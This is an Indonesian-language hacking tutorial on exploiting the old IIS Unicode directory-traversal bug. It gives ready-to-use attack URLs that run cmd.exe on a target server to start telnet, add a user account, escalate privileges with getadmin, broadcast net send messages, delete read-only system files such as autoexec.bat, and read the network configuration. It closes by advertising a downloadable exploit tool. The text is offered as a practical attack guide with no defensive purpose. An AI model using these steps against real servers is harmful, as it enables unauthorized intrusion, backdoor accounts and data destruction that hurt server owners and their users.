Eksploitasi Unicode Dengan Telnet

Eksploitasi Unicode Dengan Telnet 

Bagi rekan - rekan yang merasa "repot" menggunakan unicode bug karena setiap command harus menggunakan kode - kode yang panjang, saya kebetulan menemukan cara, yaitu dengan langsung TELnet ke server bersangkutan.

Langkah-langkahnya:

1. gunakan kode unicode yang bekerja (cmd.exe), misalnya :

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe

2. sebelum dapat telnet ke server bersangkutan, service telnet harus dinyalakan

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ net+start +telnet

3. telnet dengan telnet client ke server bersangkutan

4. bila diminta password, maka anda perlu menggunakan prosedur add user

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c +net+ user+ add+<username>+<password>+/add

5. gunakan program getadmin (bila dimungkinkan)

6. coba telnet in lagi, gunakan username dan password yang baru dibuat 7. bila beruntung, anda akan dapat bermain - main dengan command seperti jika anda menggunakan command line interface CMD.exe biasa (seperti DOS)

2--- Mengagetkan pemilik/administrator server dengan kotak message ---

Perintah ini dapat mengirim pesan / memunculkan kotak pemberitahuan (Messenger Service / Winpopup) pada layar administrator atau bahkan semua user yang login ke server bersangkutan. (menggunakan perintah NET SEND)

Langkah - langkah :

1. Gunakan kode unicode yang bekerja, misalnya :

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe

2. Masukkan perintah NET send :

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ net+ send+*+<message>

Tanda * berarti mengirim message ke semua user, dapat diganti dengan username tertentu, misalnya "administrator". <Message> adalah pesan yang ingin anda munculkan, boleh menggunakan karakter spasi (bila dikirim ke server otomatis diubah menjadi %20 oleh browser

3--- Mendelete file/folder yang read-only ---

Untuk ini gunakan perintah DEL dengan parameter /R

misalnya :

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe?/c+ del+/R+c:\autoexec.bat

4--- Melihat konfigurasi network server NT ---

Anda dapat menggunakan perintah IPCONFIG untuk melihat konfigurasi network, langkah-langkahnya :

1. Gunakan kode unicode yang bekerja, misalnya :

http://www.domain.com/scripts/..%c0%af../winnt/system32/cmd.exe

2. Jalankan program "ipconfig"

http://www.domain.com/scripts/..%c0%af../winnt/system32/ipconfig.exe

Bila tidak dapat dijalankan, anda dapat menggunakan kode cmd.exe yang bekerja untuk memindahkan / mengcopy ipconfig.exe ke folder yang executable (misalnya /wwwroot/scripts atau /inetpub/scripts) Setelah itu jalankan perintah tersebut, tanpa menggunakan cmd.exe (langsung)

--- Penutup ---

Demikian beberapa trik dari saya, semoga bermanfaat bagi rekan - rekan sekalian. Bila ada yang sudah pernah di-posting sebelumnya mohon maaf. Untuk keperluan mengeksploit unicode bug ini anda dapat menggunakan program buatan saya (bila browser dirasa terlalu rumit), bernama Madcodes RawHTTP, dapat di download dari http://channels.dal.net/madcodes/mdrhttp.exe (terakhir versi 1.40)